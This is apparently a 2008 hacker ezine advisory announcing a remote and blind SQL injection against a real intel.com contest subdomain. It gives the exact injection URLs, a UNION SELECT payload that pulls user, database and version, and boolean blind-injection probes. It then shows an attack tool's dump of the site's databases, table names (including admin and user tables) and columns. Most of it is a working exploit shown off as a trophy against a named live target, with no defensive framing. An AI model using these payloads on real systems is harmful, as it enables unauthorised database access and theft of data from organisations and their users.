┌┌───────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ [ EZINE ] ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : : : │ Website : intel.com │ │ Famous Sites Can Be │ │ Vuln Type: Remote + Blind SQL INJ │ │ │ │ Method : GET │ │ Olso Vulned │ │ Critical : High [░░▒▒▓▓██] │ │ │ │ Impact : Database access │ │ │ │ ────────────────────────────────────┘ └─────────────────────────────────── │ │ DALnet #crackers ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ [+] Remote SQL http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=-1 UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- [+] Blind SQL http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=1 and 1=1 http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=1 and 1=0 [+] Text Change Project/Company URL [+] Attack Results [+] URL:http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=1 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found! [+] Showing all databases current user has access too! [+] 02:05:19 [+] Number of Rows: 3 [0]: contests [1]: contestsapac [2]: gamecontest [+] Showing Tables from database "contests" [0]: cp_article [1]: cp_category [2]: cp_comment [3]: cp_content [4]: cp_contest [5]: cp_country [6]: cp_email [7]: cp_entry [8]: cp_entrytext [9]: cp_previewimages [10]: cp_regtext [11]: cp_rhclinks [12]: cp_rhctext [13]: cp_spotlight [14]: cp_state [15]: gd_category [16]: gd_comments [17]: gd_content [18]: gd_country [19]: gd_entry [20]: gd_entrytext [21]: gd_regtext [22]: gd_rhclinks [23]: gd_rhctext [24]: gd_spotlight [25]: gd_state [26]: gd_votecount [27]: tc_admin [28]: tc_common_avatar [29]: tc_common_user [30]: tc_entry [31]: tc_entryattachment [32]: tc_points [33]: tc_pointsmeta [34]: tc_problemattachment [35]: tc_problemset [36]: tc_status [+] Showing Columns from database "contests" and Table "tc_admin" [0]: id [1]: homepagetext [2]: registerpagetext [3]: alluserstext [4]: spotlight1 [5]: spotlight2 [6]: spotlight3 [-] 19:38:33 [-] Total URL Requests 578 [-] Done └────────────────────────────────────────────────────────────────────────────┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL . ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2008 ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘